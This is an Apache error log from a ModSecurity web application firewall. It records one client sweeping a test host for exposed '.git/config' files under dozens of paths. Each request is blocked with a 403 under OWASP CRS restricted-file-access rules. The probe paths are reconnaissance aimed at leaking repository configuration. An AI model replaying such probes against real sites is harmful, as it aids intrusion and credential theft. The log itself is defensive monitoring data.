[Wed May 22 09:56:53.067546 2024] [:error] [pid 3395396] [client 91.215.85.43:36934] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XAAAAAo"]
[Wed May 22 09:56:53.067775 2024] [:error] [pid 3395396] [client 91.215.85.43:36934] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XAAAAAo"]
[Wed May 22 09:56:53.597988 2024] [:error] [pid 3395393] [client 91.215.85.43:37076] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk2lRZnsJP7yDq0rGFtwQwAAAAc"]
[Wed May 22 09:56:53.598627 2024] [:error] [pid 3395393] [client 91.215.85.43:37076] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk2lRZnsJP7yDq0rGFtwQwAAAAc"]
[Wed May 22 09:56:53.599041 2024] [:error] [pid 3395393] [client 91.215.85.43:37076] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk2lRZnsJP7yDq0rGFtwQwAAAAc"]
[Wed May 22 09:56:53.602701 2024] [:error] [pid 3395392] [client 91.215.85.43:37224] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old-cuburn/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzQAAAAY"]
[Wed May 22 09:56:53.602715 2024] [:error] [pid 3395384] [client 91.215.85.43:36960] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_KwAAAAU"]
[Wed May 22 09:56:53.603077 2024] [:error] [pid 3395360] [client 91.215.85.43:36992] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmHwAAAAM"]
[Wed May 22 09:56:53.603111 2024] [:error] [pid 3395384] [client 91.215.85.43:36960] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_KwAAAAU"]
[Wed May 22 09:56:53.603343 2024] [:error] [pid 3395384] [client 91.215.85.43:36960] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_KwAAAAU"]
[Wed May 22 09:56:53.603395 2024] [:error] [pid 3395360] [client 91.215.85.43:36992] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmHwAAAAM"]
[Wed May 22 09:56:53.603668 2024] [:error] [pid 3395360] [client 91.215.85.43:36992] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmHwAAAAM"]
[Wed May 22 09:56:53.605426 2024] [:error] [pid 3395392] [client 91.215.85.43:37224] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzQAAAAY"]
[Wed May 22 09:56:53.605472 2024] [:error] [pid 3395396] [client 91.215.85.43:37088] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /developer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XQAAAAo"]
[Wed May 22 09:56:53.605696 2024] [:error] [pid 3395392] [client 91.215.85.43:37224] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzQAAAAY"]
[Wed May 22 09:56:53.605758 2024] [:error] [pid 3395396] [client 91.215.85.43:37088] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XQAAAAo"]
[Wed May 22 09:56:53.605991 2024] [:error] [pid 3395396] [client 91.215.85.43:37088] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XQAAAAo"]
[Wed May 22 09:56:53.607436 2024] [:error] [pid 3395357] [client 91.215.85.43:37090] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /live/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCQAAAAA"]
[Wed May 22 09:56:53.607874 2024] [:error] [pid 3395357] [client 91.215.85.43:37090] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCQAAAAA"]
[Wed May 22 09:56:53.608170 2024] [:error] [pid 3395357] [client 91.215.85.43:37090] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCQAAAAA"]
[Wed May 22 09:56:53.608186 2024] [:error] [pid 3395394] [client 91.215.85.43:37018] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32eAAAAAg"]
[Wed May 22 09:56:53.608825 2024] [:error] [pid 3395394] [client 91.215.85.43:37018] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32eAAAAAg"]
[Wed May 22 09:56:53.609171 2024] [:error] [pid 3395394] [client 91.215.85.43:37018] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32eAAAAAg"]
[Wed May 22 09:56:53.610220 2024] [:error] [pid 3395358] [client 91.215.85.43:37052] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-GwAAAAE"]
[Wed May 22 09:56:53.610547 2024] [:error] [pid 3395358] [client 91.215.85.43:37052] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-GwAAAAE"]
[Wed May 22 09:56:53.610799 2024] [:error] [pid 3395358] [client 91.215.85.43:37052] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-GwAAAAE"]
[Wed May 22 09:56:53.611389 2024] [:error] [pid 3395359] [client 91.215.85.43:37020] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cms/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQgAAAAI"]
[Wed May 22 09:56:53.611764 2024] [:error] [pid 3395359] [client 91.215.85.43:37020] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQgAAAAI"]
[Wed May 22 09:56:53.612010 2024] [:error] [pid 3395359] [client 91.215.85.43:37020] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQgAAAAI"]
[Wed May 22 09:56:53.612597 2024] [:error] [pid 3395395] [client 91.215.85.43:37022] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /config/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5swAAAAk"]
[Wed May 22 09:56:53.612883 2024] [:error] [pid 3395395] [client 91.215.85.43:37022] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5swAAAAk"]
[Wed May 22 09:56:53.613028 2024] [:error] [pid 3395395] [client 91.215.85.43:37022] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5swAAAAk"]
[Wed May 22 09:56:53.697516 2024] [authz_core:error] [pid 3395384] [client 91.215.85.43:37190] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Wed May 22 09:56:53.701645 2024] [:error] [pid 3395396] [client 91.215.85.43:37196] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /qa/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XgAAAAo"]
[Wed May 22 09:56:53.702251 2024] [:error] [pid 3395396] [client 91.215.85.43:37196] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XgAAAAo"]
[Wed May 22 09:56:53.702633 2024] [:error] [pid 3395396] [client 91.215.85.43:37196] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XgAAAAo"]
[Wed May 22 09:56:53.704569 2024] [:error] [pid 3395392] [client 91.215.85.43:37068] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /demo/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzgAAAAY"]
[Wed May 22 09:56:53.705042 2024] [:error] [pid 3395392] [client 91.215.85.43:37068] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzgAAAAY"]
[Wed May 22 09:56:53.705300 2024] [:error] [pid 3395394] [client 91.215.85.43:37242] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32eQAAAAg"]
[Wed May 22 09:56:53.705582 2024] [:error] [pid 3395394] [client 91.215.85.43:37242] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32eQAAAAg"]
[Wed May 22 09:56:53.705835 2024] [:error] [pid 3395394] [client 91.215.85.43:37242] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32eQAAAAg"]
